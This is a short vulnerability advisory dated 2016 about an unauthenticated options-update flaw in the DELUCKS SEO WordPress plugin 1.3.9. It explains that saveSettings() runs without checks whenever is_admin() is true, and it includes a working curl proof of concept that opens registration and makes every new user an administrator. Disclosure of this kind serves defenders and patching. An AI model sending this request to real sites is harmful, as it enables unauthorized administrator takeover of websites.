DELUCKS SEO [Unauthenticated Options Update]
Description
Plugin DELUCKS SEO doesn’t implement security settings when saving options.
Upon plugin initialization (in each request), it uses the is_admin()
function to define if the current request is from a site administrator.
If is_admin() returns true (which will do for every request to
wp-admin path, even non authenticated), calls the method
DPC::saveSettings(). The latest performs no security checks at all
before saving various options in DB.
In addition the options are defined dynamically from the POST request, allowing anyone to use a specially crafted POST request to update even core options.
PoC
In this proof of concept we change two core options that will open registrations and anyone who registers will be an administrator.
curl 'http://sbwp1.dev/wp-admin/index.php' \
-d 'dpc_save_settings=1&dpc[realnames][users_can_register]=1&dpc[realnames][default_role]=administrator'
INFO
- 12 May 2016
- Pan Vag
- delucks.com
- DELUCKS SEO
- 1.3.9
- WordPress 4.5
- DWF-2016-87037